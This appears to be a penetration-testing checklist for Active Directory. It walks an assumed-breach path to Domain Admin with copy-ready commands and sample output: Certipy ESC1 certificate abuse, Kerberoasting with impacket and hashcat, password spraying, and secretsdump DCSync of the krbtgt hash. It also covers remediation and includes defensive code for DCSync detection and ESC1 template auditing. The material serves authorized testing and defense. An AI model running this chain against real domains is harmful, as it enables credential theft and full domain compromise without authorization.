
Here is the uncomfortable truth about Active Directory testing: the domain usually falls because of how AD is configured, not because of an unpatched bug. Kerberos, NTLM, ACLs, and certificate templates all behave exactly as Microsoft designed them, and an attacker just walks the legitimate plumbing from a standard user to Domain Admin. Patch Tuesday does nothing about a service account whose password is its own name.
This checklist organizes the engagement by attack phase, with the specific tools (BloodHound, Certipy, impacket, Rubeus) and the real output you would see at each step, then a findings table and the controls that break each path. Use it as a tester's worksheet or a defender's threat model. It pairs directly with our internal network penetration testing guide, which covers getting that first foothold, and the broader enterprise misconfigurations picture.
Active Directory penetration testing is the authorized assessment of an AD environment to find the paths an attacker would use to escalate from a normal user to Domain Admin or compromise the domain controllers outright. It focuses on identity: tickets, hashes, group memberships, ACLs, and the trust relationships that hold a forest together.
Because AD runs on Kerberos and NTLM, most attacks abuse legitimate protocol behavior rather than software bugs, so there is often no CVE. Instead you hunt for accounts with weak passwords and SPNs, excessive delegation, dangerous ACLs, and certificate templates that let any user request a privileged cert. Defenders should read our companion on securing against Active Directory attacks.
The engagement almost always runs as an assumed breach: you start with a single standard domain user, the same position a phished employee gives a real attacker, so budget goes toward finding escalation paths rather than re-proving phishing works. From there the phases are deterministic. Enumeration feeds credential access, that feeds lateral movement, and BloodHound ties it all into a graph naming the shortest route to Tier 0.
Enumeration is the foundation, and BloodHound is the single highest-value tool. Run the collector to pull every user, group, computer, session, ACL, and trust, then query for paths from your account to Tier 0. Alongside the graph, inventory the basics with NetExec and Certipy so you know the password policy before spraying and the certificate authority before attacking it.
$ certipy find -u user@corp.local -p <pass> -dc-ip 10.0.5.10 -vulnerable
[*] Found 14 enabled certificate templates
[!] Vulnerable templates:
Template : CorpWebServer
ESC1 : True <- enrollee supplies subjectAltName
Enrollment Rights : CORP\Domain Users <- any user can enroll
[*] Saved to corp_certipy.json
That single ESC1 : True with Domain Users enrollment rights is a straight line to Domain Admin, which we exploit later. Note every service account with a Service Principal Name during enumeration; those are your Kerberoasting targets in the next phase, and read the lockout policy now (nxc smb dc01 -u user -p pass --pass-pol) so you do not freeze accounts when you spray.
Two Kerberos attacks dominate the credential-access phase because they are quiet and effective. Kerberoasting requests a service ticket for any account with an SPN, since that ticket is encrypted with the service account's password hash, then cracks it offline. AS-REP roasting targets accounts with pre-authentication disabled and needs no credentials at all.
$ GetUserSPNs.py corp.local/user:<pass> -dc-ip 10.0.5.10 -request
ServicePrincipalName Name MemberOf
-------------------- ---------- -------------------------
MSSQL/sql01.corp svc_sql SQL Admins
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQL...<hash blob>... <- crackable TGS
$ hashcat -m 13100 kerb.txt rockyou.txt -r rules/best64.rule
$krb5tgs$23$*svc_sql*...:Summer2023! <- service account password cracked
Session..........: Cracked
That svc_sql account sits in SQL Admins, so its cracked password is immediate lateral movement. On a Windows foothold the equivalents are Rubeus.exe kerberoast and Rubeus.exe asreproast. Password spraying is the other staple: one weak password against every user, staying under the lockout threshold you read during enumeration (nxc smb dc01 -u users.txt -p 'Spring2026!' --continue-on-success).
ADCS abuse is now one of the fastest privilege-escalation routes, cataloged ESC1 through ESC8 by SpecterOps. ESC1 is a template that lets a low-privilege user enroll and supply an arbitrary Subject Alternative Name, so you request a certificate as the domain administrator and authenticate as them. Certipy automates the whole chain.
$ certipy req -u user@corp.local -p <pass> -ca CORP-CA \
-template CorpWebServer -upn administrator@corp.local
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Saved certificate and private key to 'administrator.pfx' <- a cert that says you are DA
$ certipy auth -pfx administrator.pfx -dc-ip 10.0.5.10
[*] Using principal: administrator@corp.local
[*] Got hash for 'administrator@corp.local': aad3b4...:fc525c9...<NT hash> <- the DA NT hash
On a recent assessment of a manufacturing client, that exact chain took a freshly created standard user to Domain Admin in four commands, faster than their EDR finished its first scan of the host. Beyond ADCS, escalate through ACL abuse (GenericWrite to set an SPN then Kerberoast, WriteDACL to grant yourself DCSync) and unconstrained delegation, all of which BloodHound surfaces directly.
Domain dominance is the endgame: full control of the domain plus the ability to regain it at will. DCSync abuses replication rights to pull every password hash from a domain controller, including the krbtgt hash, without running code on the DC.
$ secretsdump.py -just-dc-user krbtgt corp.local/da_user@10.0.5.10
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
krbtgt:502:aad3b435b51404ee:1a59bd44fe5bca7e...<NT hash>::: <- forge golden tickets with this
With the krbtgt hash you forge a golden ticket and impersonate anyone, indefinitely. Silver tickets forge service-specific access, and a DSRM or AdminSDHolder backdoor gives quiet long-term persistence. This is exactly why incident response after an AD breach insists on rotating krbtgt twice and rebuilding trust. Because these paths reappear as the directory changes, continuous validation matters; agentic pentesting re-walks these chains as group memberships and templates drift instead of waiting a year.
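The DCSync pull above leaves a trace on the domain controller: Security event 4662 records the principal exercising the replication extended rights. This added example (not code from the original checklist) shows the detection logic a defender would run over those events, flagging replication from anything that is not a DC machine account; the account and host names and the sample events are constructed.

```python
"""Flag replication (DCSync-style) requests from non-DC principals in Security log events.

Added example, not code from the original checklist. It inspects Windows Security event 4662
records; host/account names and the sample events are constructed. The two GUIDs are the
well-known Active Directory extended rights a DCSync client must hold on the domain object.
"""
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Machine accounts of the real domain controllers (constructed); DC-to-DC replication is normal.
DOMAIN_CONTROLLERS = {"CORP\\DC01$", "CORP\\DC02$"}


def subject_of(event: dict) -> str:
    """DOMAIN\\user of the principal that performed the operation."""
    return f"{event.get('SubjectDomainName', '')}\\{event.get('SubjectUserName', '')}"


def is_dcsync_candidate(event: dict) -> bool:
    """True for a 4662 event where a non-DC principal exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    # Properties lists the access-right/property GUIDs in braces, one per line in the real event.
    guids = {tok.strip("{}").lower() for tok in event.get("Properties", "").split()}
    if not guids & REPLICATION_RIGHTS:
        return False
    return subject_of(event).upper() not in DOMAIN_CONTROLLERS


def find_dcsync(events: list[dict]) -> list[str]:
    """Distinct non-DC principals that requested directory replication."""
    return sorted({subject_of(e) for e in events if is_dcsync_candidate(e)})


# Constructed sample events; live data comes from the DCs' Security logs and needs the
# "Directory Service Access" audit subcategory enabled so 4662 is written at all.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",     # normal DC replication
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "da_user",   # secretsdump-style pull
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",      # unrelated read (constructed GUID)
     "Properties": "%%7688 {11111111-2222-3333-4444-555555555555}"},
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "da_user"},  # a logon, not 4662
]
```

A production rule would also allow-list the accounts of legitimate replication consumers (Azure AD Connect, for example) and alert on the first occurrence per principal rather than every event.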
Remediation maps almost one-to-one onto the attack phases, and a handful of controls collapse most paths. Cut credential theft at the source: enforce SMB signing and disable LLMNR/NBT-NS so relay and poisoning fail, and move every service account to a group Managed Service Account (gMSA) so passwords are 120-plus characters and rotate automatically, which makes Kerberoasting pointless.
Then attack the relationships BloodHound exposed. Adopt a tiering model keeping Tier 0 (Domain Admin, DC) credentials off Tier 1 servers and Tier 2 workstations, deploy LAPS so a dumped local hash stops spreading, and prune dangerous ACLs (GenericAll, WriteDACL, GenericWrite) plus unconstrained delegation. For ADCS, harden the template directly: set CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT off so enrollees cannot supply a SAN, require manager approval for enrollment, and remove client-authentication EKU where it is not needed, which kills ESC1 outright. Finally, monitor for DCSync replication from non-DC hosts and rotate krbtgt twice if compromise is suspected. Pair this with our guide on securing against Active Directory attacks.
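To make the ADCS hardening above checkable, here is an added audit (not code from the original article or from Certipy) that evaluates a template's LDAP attributes against the ESC1 preconditions and shows the weak CorpWebServer template from the enumeration output beside its hardened version. The flag bits and EKU OIDs are Microsoft's published values; the two template records and the group names are constructed.

```python
"""Audit certificate templates for the ESC1 preconditions; added example, not Certipy code.

Templates are dicts shaped like pKICertificateTemplate LDAP attributes (constructed data);
'enrollment_rights' stands in for the principals granted Enroll in the template's security descriptor.
"""
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (CA manager approval)

# EKUs that make the issued certificate usable for logon (Kerberos PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Enrollment granted to these principals means every domain user can enroll (constructed names).
BROAD_ENROLLERS = {"CORP\\Domain Users", "CORP\\Authenticated Users"}


def esc1_findings(t: dict) -> list[str]:
    """Return the ESC1 preconditions the template satisfies; all five together make it ESC1."""
    findings = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject/SAN")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if t["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signature required")
    ekus = set(t["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list means any purpose
        findings.append("certificate usable for client authentication")
    if set(t["enrollment_rights"]) & BROAD_ENROLLERS:
        findings.append("low-privilege users can enroll")
    return findings


def is_esc1(t: dict) -> bool:
    return len(esc1_findings(t)) == 5


# The weak template from the enumeration output, beside its hardened form (both constructed).
WEAK = {
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],  # Server + Client Auth
    "enrollment_rights": ["CORP\\Domain Users"],
}
HARDENED = {
    **WEAK,
    "msPKI-Certificate-Name-Flag": 0,                    # subject/SAN built from AD, not the requester
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,  # CA manager must approve each request
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],        # Server Authentication only
    "enrollment_rights": ["CORP\\Web Admins"],           # constructed narrow group
}
```

Any one of the three changes in HARDENED already breaks the ESC1 chain; applying all three also removes the residual risk from the other preconditions.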